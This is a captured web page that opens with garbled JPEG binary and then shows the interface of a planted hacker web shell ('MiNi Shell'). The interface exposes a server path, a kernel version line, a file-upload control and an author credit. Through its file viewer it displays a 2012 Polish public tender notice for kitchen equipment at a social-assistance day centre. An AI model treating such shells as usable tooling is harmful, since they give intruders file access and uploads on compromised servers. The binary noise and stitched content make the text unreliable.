JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120608/192886-N-2012.html

<p class="kh_header"><b>Czechowice-Dziedzice: Dostawa i montaż mebli gastronomicznych i przemysłowego sprzętu kuchennego   do pomieszczeń kuchni w budynku Ośrodka Dziennego Pobytu w Czechowicach- Dziedzicach przy ul. Mickiewicza 19.</b><br>
<b>Numer ogłoszenia: 192886 - 2012; data zamieszczenia: 08.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Czechowicach-Dziedzicach , ul. Kolejowa 37, 43-502 Czechowice-Dziedzice, woj. śląskie, tel. 32 2154409, faks 32 2154409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.czechowice-dziedzice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli gastronomicznych i przemysłowego sprzętu kuchennego   do pomieszczeń kuchni w budynku Ośrodka Dziennego Pobytu w Czechowicach- Dziedzicach przy ul. Mickiewicza 19..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykaz wyposażenia:
1.Stół do pracy - 800x600x850 - Stół  wykonany na 4 nogach ze stałymi stopkami, z rantem z tyłu i po prawej stronie.
2. Stół ze zlewem 2 komory - 1000x600x850 - Stół z rantem z tyłu, otwór na młynek koloidalny.
3.Młynek koloidalny z wyłącznikiem pneumatycznym - Cylindryczna komora wraz z elementami rozdrabniającymi wykonana ze stali nierdzewnej, posiada podwójne wyciszenie tej komory.
4.Stół z półką -1200x600x850 -Stół  z rantem z tyłu, wykonany na 4 nogach, półka na samym dole nie zamykana. 
5.Stół ze zlewem 1 komora -	1200x600x850 -Stół z komorą po lewej stronie, wykonany na 4 nogach z rantem z tyłu.
6.Robot wielofunkcyjny + stojak - 500x 270x315 - Robot wyposażony w przystawkę do mielenia mięsa z misą i popychaczem, przystawką do rozdrobnienia jarzyn + 7 tarcz, 400V,moc 1,1kW.
7.Stół z szafką -1200x600x850 -Stół z rantem z tyłu, szafka 2 drzwiowa,otwierana na zawiasach.
8. Stół z szafką -1200x600x850-j.w + rant z lewej.
9.Stół z szafką i szufladami -	1200x600x850 -Stół z rantem z tyłu i  po prawej stronie, szafka 1 drzwiowa oraz 2 szuflady po stronie prawej.
10.Regał ociekowy perforowany -800x600x1800 -Regał wykonany na 4 stałych stopkach, półek szt 4 z możliwością regulacji.
11.Stół z basenem  2 komory -1200x700x850 -Stół z rantem z tyłu, głębokość komory 40cm.
12.Stół do pracy-700x700x850 -Stół z rantem z tyłu i po lewej stronie- stół rogowy w tylnym rogu wycięcie na komin wentylacyjny o wymiarach 20x20 dokładny wymiar wycięcia należy uzgodnić z Zamawiającym po zawarciu umowy.
13.Stół z basenem 2 komory-1200x700x850 -Stół z rantem z tyłu, głębokość komory 40cm.
14.Podest drewniany- 500x700x150.	
15.Taboret gazowy- 600x650x400 -Posiada 1 palnik, moc do podgrzania 100l płynu, zawór odcinający dopływ gazu w razie zgaśnięcia płomienia.
16.Kocioł warzelny elektryczny 80l -800x700x850 -Wyposażony w przyłącze ciepłej i zimnej wody, automatyczny system kontroli i regulacja ciśnienia, poziomu wody, płynna regulacja mocy, zawór spustowy, zasilanie 400V, moc12,5kW.
17.Stanowisko robocze na szafce -600x700x850.	
18.Kuchnia gazowa 4 palnikowa z piekarnikiem elektrycznym- 800x700x850-400V, moc 6,5kW.
19.Patelnia elektryczna 50l -	800x700x850-Posiada misę przechylną, termostat oraz mikro wyłączniki odcinające zasilanie w momencie przechyłu misy, 400V.
20.Stanowisko robocze na szafce -600x700x850.	
21.Okap wentylacyjny centralny z łapaczami tłuszczu i oświetleniem -3000x1800x 
400 -Posiada system rynien ociekowych odprowadzających osadzające się zanieczyszczenia.
22. Stół ze zlewem 1komora	- 1200x600x850 -Komora po stronie lewej, z rantem ,z tyłu.
23.Stół ze zlewem 1komora -1200x600x850 -Komora po stronie lewej, z rantem, z tyłu.
24.Stół ze zlewem 1komora -1200x600x850 -Komora po stronie lewej, z rantem, z tyłu.
25.Płuczko-obieraczka 0,37kW z separatorem obierzyn -520x700x1010 -400V, pokrywa urządzenia z wyłącznikiem bezpieczeństwa, separator obierzyn montowany pod urządzeniem, wydajność min.60kg/h.
26. Lodówka na jajka -470x500x815.	
27.Stół ze zlewem 1komora -1200x600x850 -Komora po stronie lewej, z rantem z tyłu i po prawej stronie.
28.Stół z półką- 800x600x850 -Stół z rantem z tyłu i po lewej stronie, półką na samym dole nie zamykana, 4 nogi.
29.Naświetlacz do jaj szufladowy - 360x530x245 -Urządzenie do powierzchniowego odkażania jaj, dezynfekuje jednorazowo 30szt jaj.
30.Waga magazynowa 60kg.
31.Podest drewniany 2 szt. -500x700x150.	
32.Zlew 1komorowy -Bez ociekacza.
33.Stół do pracy - 1000x600x850 -Stół na 4 nogach, z rantem z tyłu.
34. Regał magazynowy - 800x600x1800 -Regał na stopkach stałych, półek szt.4 z możliwością regulacji.
35.Regał magazynowy -1200x600x 1800 -Regał na stopkach stałych, półek szt.4 z możliwością regulacji.
36.Regał magazynowy -1000x600x1800 -Regał na stopkach stałych, półek szt.4 z możliwością regulacji.
37.Stół do pracy -800x 600x 850 -Stół na stopkach stałych, z rantem z tyłu.
38.Szafa chłodnicza 700l -700x860x2000 -Komora szafy posiada 4 ruszty, agregat przystosowany do pracy przy wilgotności 60% i temperatury otoczenia 43° C, z automatycznym rozmrażaniem, odprowadzaniem skroplin.
39.Zamrażarka szufladowa poj. 240l -600x600x1500 -6 przestrzeni zamrażalniczych.
40.Stół ze zlewem 1komora -1200x600x850 -Stół na 4 nogach, komora po stronie lewej, z rantem z tyłu.
41.Bemar elektryczny + komplet pojemników z pokrywami	- 1495x600x850 - Zbiornik h =200,bemar jezdny, zasilanie 230V na podstawie z półką, posiada  kran spustowy.
42.Stół ze zlewem 1komora - 1200x600x850 -Stół na 4 nogach, z rantem z tyłu, komora po stronie lewej.
43.Stół z półką -800x600x850 -Stół z rantem z tyłu, półka na dole nie zamykana
44. Szafa przelotowa drzwi suwane -800x600x1800.	
45.Stół z półką -800x600x850 -Stół z rantem z tyłu i po prawej stronie.
46.Stół z otworem na odpadki -1000x600x850 -	Stół z rantem z tyłu i po lewej stronie, otwór po stronie prawej.
47.Stół ze zlewem 1komora - 800x600x850 -Komora po prawej stronie, otwór na młynek koloidalny - młynek dostarcza zamawiający.
48.Zmywarka kapturowa do mycia naczyń -635x749x1469 -Wysokość przy otwartym kapturze1932, poj. zbiornika 42l, 400V, moc 15,6kW.
49.Stół odstawczy z półką - 800x700x850 -Stół z rantem z tyłu.
50.Regał magazynowy -600x600x1800 -Regał na stopkach stałych, półek szt.4 z możliwością regulacji.
51.Szafa magazynowa -500x600x1800	 -Szafa na nogach do regulacji, zamykana tradycyjnie.
52.Podest drewniany -600x600x150.	
53.Regał magazynowy -1200x600x1800 - Regał na stopkach stałych, półek szt 4 z możliwością regulacji.
54.Regał magazynowy - 600x600x1800 -Regał na stopkach stałych, półek szt 4 z możliwością regulacji.
55.Wózek platformowy -600x500.	
56.Stół z półką -1600x600x850 -Stół z  półką na dole stołu, nie zamykana.
57.Stół ze zlewem 1komora - 800x600x850 -Komora po stronie prawej, z rantem z tyłu.
58.Młynek koloidalny z wyłącznikiem pneumatycznym - Cylindryczna komora wraz z elementami rozdrabniającymi wykonana ze stali nierdzewnej, podwójne wyciszenie tej komory.
59.Zmywarka do naczyń - 600x637x810 -wymiary kosza 500x500mm, 400V.
60.Szafa przelotowa drzwi suwane -800x600x1800.	
61.Stół z półką -600x600x850 -Stół z rantem z tyłu i po prawej stronie, półka na dole stołu nie zamykana.
62.Stół z półką -1600x600x850 -Stół z rantem z tyłu, półka na dole stołu nie zamykana.
63.Stół ze zlewem - 2 komory -1000x600x850 -Stół z rantem z tyłu.
Meble gastronomiczne muszą być wykonane ze stali nierdzewnej, przeznaczone do wyposażenia zapleczy kuchennych w obiektach gastronomicznych.
Główne podzespoły mebli muszą być wykonane z blach o grubości min. 1.0 mm
-blaty stołów ze zlewami, blaty basenów - blacha 1,2 do 1,5 mm,
-stelaże stołów, regałów - wykonane z profilu zamkniętego min. 35x35 mm.
Powierzchnie robocze oraz miejsca widoczne na zewnątrz muszą być szlifowane.
Nogi mebli muszą być wyposażone w stopki z tworzywa z  regulacją umożliwiającą wypoziomowanie.
Konstrukcja mebli musi być spawana, szafy i szafki mają drzwi uchylne na zawiasach skrzydełkowych lub przesuwne zawieszone na wózkach rolkowych, szuflady wyposażone są w prowadnice kulkowe.
Powierzchnie robocze płyt ze zlewozmywakami muszą być profilowane w sposób zabezpieczający przed spływaniem wody poza obrys stołu.
Zlewozmywaki i wanny posiadają otwory do zamontowania baterii -baterie  oraz jeden młynek koloidalny dostarcza zamawiający.  
Urządzenia o klasie efektywności energetycznej A.
Sprzęt chłodniczy biały malowany proszkowo..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.31.40.00-6, 39.14.10.00-2, 42.51.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 2000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-sposób dokonywania oceny spełnienia warunku - według zasady spełnia/ nie spełnia, na podstawie oświadczenia Wykonawcy, którego treść jest załącznikiem nr 3 do SIWZ.    
-Zamawiający  w zakresie tego warunku nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-sposób dokonywania oceny spełnienia warunku - według zasady spełnia/ nie spełnia, na podstawie: oświadczenia Wykonawcy którego treść jest załącznikiem nr 3 do SIWZ oraz wykazania  się wykonaniem w ciągu ostatnich trzech lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch dostaw mebli gastronomicznych o wartości co najmniej 30 000 PLN każda oraz co najmniej dwóch dostaw specjalistycznego sprzętu AGD o wartości 30 000 PLN każda  wraz z potwierdzeniem że dostawy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-sposób dokonywania oceny spełnienia warunku - według zasady spełnia/ nie spełnia,  na podstawie oświadczenia Wykonawcy którego treść jest załącznikiem nr 3 do SIWZ, 
 -Zamawiający  w zakresie tego warunku nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-sposób dokonywania oceny spełnienia warunku - według zasady spełnia/ nie spełnia,  na podstawie oświadczenia Wykonawcy którego treść jest załącznikiem nr 3 do SIWZ, 
 -Zamawiający  w zakresie tego warunku nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-sposób dokonywania oceny spełnienia warunku - według zasady spełnia/ nie spełnia, na podstawie oświadczenia Wykonawcy którego treść jest załącznikiem nr 3 do SIWZ, 
 -Zamawiający  w zakresie tego warunku nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Za zgodą Zamawiającego dopuszcza się możliwość zmiany poszczególnych pozycji wyposażenia, pod warunkiem zastąpienia go nowocześniejszym modelem o lepszych parametrach technicznych korzystniejszych dla Zamawiającego z zachowaniem ceny jednostkowej przedstawionej w ofercie, z zachowaniem formy pisemnej poprzez wprowadzenie aneksu do umowy.
Dopuszcza się zmianę terminu wykonania umowy na późniejszy,  z przyczyn leżących po stronie Zamawiającego, związanych z opóźnieniem prac  remontowych prowadzonych w pomieszczeniach kuchennych Ośrodka Dziennego Pobytu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ops.czechowice-dziedzice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej, 43-502 Czechowice- Dziedzice, ul. Kolejowa 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej, 43-502 Czechowice- Dziedzice, ul. Kolejowa 37
-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com